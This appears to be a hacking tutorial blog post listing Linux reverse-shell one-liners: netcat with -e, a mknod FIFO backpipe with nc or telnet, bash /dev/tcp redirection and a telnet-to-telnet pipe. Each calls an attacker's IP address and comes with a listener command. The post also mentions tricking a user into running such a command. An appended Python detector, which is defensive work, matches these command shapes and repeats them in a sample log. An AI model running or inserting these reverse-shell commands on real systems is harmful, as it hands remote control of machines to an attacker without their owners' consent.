Spawning Reverse Shells

kingskrupellos2

Preface

This will be a short article which demonstrates how to spawn an interactive reverse shell using built-in tools on any Linux distribution.
It also shows what mindset and what kind of creativity a hacker or pen tester might need.

But why?

There are many Linux distributions, and they all do things a little differently with regard to built-in tools and/or security mechanisms.
The tools used in the following examples should be available no matter which OS is in front of you.

Test scenario

  • being able to run a simple command, or
  • cause a user to run a simple command on the target system

Examples

In the following examples each command carries a marker, A or T, which
stands for Attacker or Target and shows where to run the command.

1. netcat

nc <attacker_ip> <port> -e /bin/bash # T
nc -n -vv -l -p <port> # A

In current versions of netcat the -e flag probably won't be available
anymore, but if it is, this makes life really easy.

2. netcat with -e disabled

One could just move on to other tools or means now, since the -e flag
is not available anymore, but hey, let's make things look really complicated
and hacker-like :wink:

mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe # T
nc -n -vv -l -p <port> # A

[image: netcat_no_e]

What does this do?

We create a FIFO (named pipe) file system object and use it as a backpipe: netcat's standard output is piped into /bin/bash as its input, bash writes its standard output into the FIFO, and netcat reads its standard input from that same FIFO, so the output of the executed commands is relayed back to nc.

3. netcat without netcat

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 # T
nc -n -vv -l -p <port> # A

[image: netcat_no_netcat]


What does this do?

It uses bash's /dev/tcp pseudo-device (bash's built-in socket feature) to open a TCP connection to the remote system and redirects the interactive /bin/bash's standard output, input and error to it.

4. netcat without netcat or /dev/tcp

mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe # T
nc -n -vv -l -p <port> # A

[image: netcat_no_netcat_no_dev_tcp]


What does this do?

This should be clear by now. We just use telnet instead of netcat, in the same way as in example 2 above.

5. telnet to telnet

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> # T
nc -n -vv -l -p <1st_port> # A1
nc -n -vv -l -p <2nd_port> # A2
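From the defender's side, the five command shapes above are exactly the strings worth alerting on in process-execution or shell-history logs. The following is an added example, not part of the original post, that encodes those shapes as regular expressions and runs them over a constructed sample log; the log format (timestamp, uid, cmd), the indicator names and the sample lines are my own assumptions, not output of any real tool.

```python
import re

# Constructed sample of process-execution records, in a simple shape a
# command-line logger might produce: "<timestamp> uid=<n> cmd=<command line>".
# The flagged lines mirror the command shapes shown in the post; the rest is
# benign noise (a port check, a backup, a block-device mknod) that must not fire.
SAMPLE_LOG = """\
2025-11-02T10:00:01 uid=1001 cmd=ls -la /tmp
2025-11-02T10:00:02 uid=1001 cmd=nc 10.0.0.5 4444 -e /bin/bash
2025-11-02T10:00:03 uid=1001 cmd=nc -zv db.internal 5432
2025-11-02T10:00:04 uid=1001 cmd=mknod backpipe p; nc 10.0.0.5 4444 0<backpipe | /bin/bash 1>backpipe
2025-11-02T10:00:05 uid=1001 cmd=/bin/bash -i > /dev/tcp/10.0.0.5/4444 0<&1 2>&1
2025-11-02T10:00:06 uid=1001 cmd=tar czf backup.tgz /var/www
2025-11-02T10:00:07 uid=1001 cmd=mknod backpipe p; telnet 10.0.0.5 4444 0<backpipe | /bin/bash 1>backpipe
2025-11-02T10:00:08 uid=1001 cmd=telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 4445
2025-11-02T10:00:09 uid=0    cmd=mknod /dev/loop0 b 7 0
"""

# Indicator names are assumptions made for this example. Each pattern follows
# one example from the post:
#   1) nc/netcat with "-e /bin/sh|bash" (example 1)
#   2) a FIFO created with "mknod <name> p" feeding nc or telnet into a shell (examples 2 and 4)
#   3) bash's /dev/tcp/<host>/<port> pseudo-device (example 3)
#   4) telnet piped into a shell piped into a second telnet (example 5)
INDICATORS = [
    ("nc_exec_flag",        re.compile(r"\bn(c|etcat)\b[^|;]*\s-e\s+/bin/(ba)?sh\b")),
    ("fifo_backpipe_relay", re.compile(r"\bmknod\s+\S+\s+p\b.*\b(nc|netcat|telnet)\b.*\|\s*/bin/(ba)?sh\b")),
    ("bash_dev_tcp",        re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("telnet_double_pipe",  re.compile(r"\btelnet\b[^|]*\|\s*/bin/(ba)?sh\b\s*\|\s*telnet\b")),
]

RECORD_RE = re.compile(r"(\S+)\s+uid=(\d+)\s+cmd=(.*)$")


def parse_record(line):
    """Split one log line into (timestamp, uid, cmd); None if it is not a record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), int(m.group(2)), m.group(3)


def matched_indicators(cmd):
    """Return the names of all indicators whose pattern occurs in the command line."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def scan_log(text):
    """Return one hit per record whose command matches at least one indicator."""
    hits = []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        ts, uid, cmd = rec
        names = matched_indicators(cmd)
        if names:
            hits.append({"ts": ts, "uid": uid, "cmd": cmd, "indicators": names})
    return hits


def count_by_indicator(hits):
    """Aggregate hits into {indicator_name: number_of_records}."""
    counts = {}
    for hit in hits:
        for name in hit["indicators"]:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f'{hit["ts"]} uid={hit["uid"]} {hit["indicators"]}: {hit["cmd"]}')
    print(count_by_indicator(found))
```

The patterns deliberately key on the combination of tools (a FIFO plus nc or telnet plus a shell, or a shell plus /dev/tcp) rather than on `nc` or `mknod` alone, which is why the port check and the block-device `mknod` in the sample do not fire; in production these rules would sit on top of whatever process-creation telemetry the host already ships (auditd `execve` records, for instance), not on a hand-made text log.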


